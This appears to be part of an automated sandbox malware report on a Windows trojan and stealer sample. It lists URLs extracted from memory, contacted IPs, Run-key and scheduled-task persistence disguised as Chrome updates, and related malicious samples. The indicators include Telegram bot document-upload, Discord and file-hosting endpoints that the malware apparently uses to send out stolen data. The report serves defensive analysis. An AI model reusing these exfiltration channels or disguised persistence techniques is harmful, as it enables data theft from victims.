https://google.com/mail	based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/file/bot	main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539	based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125974666.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120360311.000001EB8753C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124224043.000001EB87540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com/	based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServerr	based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	TS-240605-Millenium1.exe, 00000002.00000003.1839123127.000002874E458000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874DFC0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86A40000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1901068815.000001BF9A1E8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/v9/users/	based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=225545r	based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yahoo.com/	based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.co	TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/	based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/time-zones/repository/tz-link.html	based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServer	based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.coR	hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://json.org	based.exe, 00000008.00000003.1899424084.000001EB87177000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/dev/peps/pep-0205/	hacn.exe, 00000006.00000003.1869625462.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/	based.exe, 00000008.00000003.2121494998.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sqlite.org/copyright.html2	s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2054080232.00007FFDF5458000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/	based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail/	based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digiCi	based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com/mail/	based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123442930.000001EB87201000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png	based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.openssl.org/H	based.exe, 00000007.00000003.1876475016.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2131676898.00007FFDFAC30000.00000004.00000001.01000000.0000001C.sdmp, based.exe, 00000008.00000002.2138193378.00007FFE00828000.00000004.00000001.01000000.0000001D.sdmp, svchost.exe, 00000016.00000003.1957532160.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com~?0i	main.exe, 00000015.00000002.1999999146.0000025EB7D62000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);	based.exe, 00000008.00000002.2122205502.000001EB850C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://system.data.sqlite.org/	s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0263/	TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp	false		unknown
http://ip-api.com/line/?fields=hosting	based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
185.199.109.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	true
216.58.212.132	www.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1452142
Start date and time:	2024-06-05 03:55:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	80
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	3
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TS-240605-Millenium1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@132/153@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.22, 40.126.32.72, 40.126.32.68, 40.126.32.76, 40.126.32.74, 40.126.32.138, 20.190.160.14, 93.184.221.240, 20.42.73.29, 142.250.185.99
Excluded domains from analysis (whitelisted): google.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, pool.hashvault.pro, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, gstatic.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:56:35	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
02:56:39	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\svchost.exe
02:56:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
02:56:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\svchost.exe
02:57:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
21:56:26	API Interceptor	1x Sleep call for process: setup.exe modified
21:56:26	API Interceptor	126x Sleep call for process: powershell.exe modified
21:56:28	API Interceptor	34x Sleep call for process: main.exe modified
21:56:34	API Interceptor	1x Sleep call for process: updater.exe modified
21:56:34	API Interceptor	1x Sleep call for process: WMIC.exe modified
21:57:07	API Interceptor	320330x Sleep call for process: winlogon.exe modified
21:57:09	API Interceptor	269612x Sleep call for process: lsass.exe modified
21:57:11	API Interceptor	7141x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	ip-api.com/json
	rSOA_2388400.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rrTqdiabb.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	bcZKCl7InB.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	VYoxkaHLzd.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	6TWxXMNmQ7.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	m25LNv52uB.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	H2sUiEdqWp.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	3W829li8ED.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	qWqaKrnuNk.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	VVTR3CvX6G.exe	Get hash	malicious	XWorm	Browse
	Inquiry-N#U00b0 3079-24-06.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	Quotation Request - RFQ018232901983234.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse
	ShippingDocuments-PONBOM01577.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse
	Inquiry-N#U00b0 3079-24-06.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.16366.10350.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	2udVrfirtX.exe	Get hash	malicious	AgentTesla	Browse
	quotationsheet.exe	Get hash	malicious	AgentTesla	Browse
	file.xe.exe	Get hash	malicious	AgentTesla	Browse
185.199.109.133	https://advaith07.github.io/Netflix_ui_clone	Get hash	malicious	Unknown	Browse
	J5QZtYKm.posh.ps1	Get hash	malicious	Unknown	Browse
	TS-240531-UF2-Creal.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.Trojan.Siggen28.49964.22862.27682.exe	Get hash	malicious	Coinhive, Xmrig	Browse
	http://www.pepe.vip	Get hash	malicious	Unknown	Browse
	https://contact-meta-policy-here.vercel.app/next.html/	Get hash	malicious	Unknown	Browse
	https://nimanbhattarai.github.io/Netflix-Clone	Get hash	malicious	Unknown	Browse
	https://wsswsswsswss.github.io/myfirstswap	Get hash	malicious	Unknown	Browse
	Android TV Tools v3_ES.exe	Get hash	malicious	Unknown	Browse
	Android TV Tools v3_EN.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	exploit.bat	Get hash	malicious	Abobus Obfuscator	Browse	185.199.108.133
	d-obf.bat	Get hash	malicious	Abobus Obfuscator	Browse	185.199.111.133
	J5QZtYKm.posh.ps1	Get hash	malicious	Unknown	Browse	185.199.109.133
	file.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer	Browse	185.199.108.133
	cb67a188bafea0fd5f5e9725881c88a1c494763c094f76df73914bd8cadce170_dump.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer	Browse	185.199.110.133
	f8cbaeb306d1b88f79680d5abaa871541cdaecbe8f28fe6e7b4d1c6e808a97de_payload.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer	Browse	185.199.111.133
	https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	185.199.111.133
ip-api.com	rSOA_2388400.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rrTqdiabb.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	bcZKCl7InB.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VYoxkaHLzd.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	6TWxXMNmQ7.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	m25LNv52uB.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	H2sUiEdqWp.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	3W829li8ED.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	qWqaKrnuNk.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	g2pOMxWjKW.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
api.telegram.org	VVTR3CvX6G.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Inquiry-N#U00b0 3079-24-06.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Quotation Request - RFQ018232901983234.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	ShippingDocuments-PONBOM01577.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	Inquiry-N#U00b0 3079-24-06.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.16366.10350.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	2udVrfirtX.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	quotationsheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.xe.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
fp2e7a.wpc.phicdn.net	https://secure-firstinterstatebank.weebly.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://ignitechristianacademy.com/landing/switch-at-semester/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.dtmvvstroe.com/products/glucosemeter?fbclid=IwAR1k6Dvg7f8dQ-6SmQ_1V2jypO9heXODSNXbo-Yaptmgt3vD0FjdMjXpXTY_aem_AbN4faZMQf_mPGAiVRoRaROt2AjTJVbfU5Hl28o73uQ8sbEXRNDiz4lo76Ew2i5dxnziOjrGIzpIBRh6bQcKAgL7	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://clps.it/iw9zk	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://elenmistoprak.com/1496133940/Instagram.com.php	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://www.sorttexclothing.com/portugal/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://jeffco.us	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://jgt.ygs.mybluehost.me/mimderz/net	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://t21momma.com/in	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://syderybaba.site/	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	jL8AjRK30O.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	zXC6sI6VAb.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	VVTR3CvX6G.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Inquiry-N#U00b0 3079-24-06.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Quotation Request - RFQ018232901983234.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	ShippingDocuments-PONBOM01577.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	Jxo0X2iMrd.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
FASTLYUS	https://secure-firstinterstatebank.weebly.com	Get hash	malicious	HTMLPhisher	Browse	151.101.193.46
	https://ignitechristianacademy.com/landing/switch-at-semester/	Get hash	malicious	HTMLPhisher	Browse	23.185.0.4
	https://elenmistoprak.com/1496133940/Instagram.com.php	Get hash	malicious	Unknown	Browse	185.199.108.153
	https://pub-75689d854e6c4de1b0d582fd618f0788.r2.dev/NorthCoastConstructionOdoxtxx.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://int-review.pro/Qdw6Ueh2/auth2.html	Get hash	malicious	HTMLPhisher	Browse	151.101.1.140
	https://mobile-facebookmetalyd.weebly.com/?fbclid=IwZXh0bgNhZW0CMTAAAR2jGyq7e0VOi25zqoufOOsZrVgRJn6Ow4jjT6iAh8d6NksK82_CurthOR4_aem_AZCE56VK2fBoGRfRpCelHC2gFaY9AvVzFjaqJp3Psy3XrHHOp4F2dMBnvsWQ6IXuFHvCoPp95Dp9-9uVPe83gBja	Get hash	malicious	Unknown	Browse	151.101.129.46
	http://delicate-abrasive-dragonfruit.glitch.me/public/z1t0y.htm	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://endearing-cranachan-46d870.netlify.app/appeal.html/	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://1kb.link/8c563	Get hash	malicious	HTMLPhisher	Browse	151.101.1.140
	http://trans3ce2-nden3t-ban34ffee-qa-896b9d.netlify.app/dev.html	Get hash	malicious	Unknown	Browse	151.101.1.229
TUT-ASUS	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	208.95.112.1
	rSOA_2388400.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rrTqdiabb.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	bcZKCl7InB.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VYoxkaHLzd.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	6TWxXMNmQ7.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	m25LNv52uB.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	H2sUiEdqWp.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	3W829li8ED.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	qWqaKrnuNk.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	csskFdnsMZ.exe	Get hash	malicious	BazaLoader	Browse	149.154.167.220 185.199.109.133
	https://clps.it/iw9zk	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133
	http://jeffco.us	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133
	https://syderybaba.site/	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133
	https://int-review.pro/Qdw6Ueh2/auth2.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 185.199.109.133
	https://page-timedsdds.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 185.199.109.133
	https://protect-team-t440406-04ahd4.netlify.app/form.html	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133
	https://www.tggift7.site/a/	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133
	https://pub-18870b45185741c4afc2cd4880ebe308.r2.dev/final.html?folder=CZcrwFE	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 185.199.109.133
	https://endearing-cranachan-46d870.netlify.app/appeal.html/	Get hash	malicious	Unknown	Browse	149.154.167.220 185.199.109.133

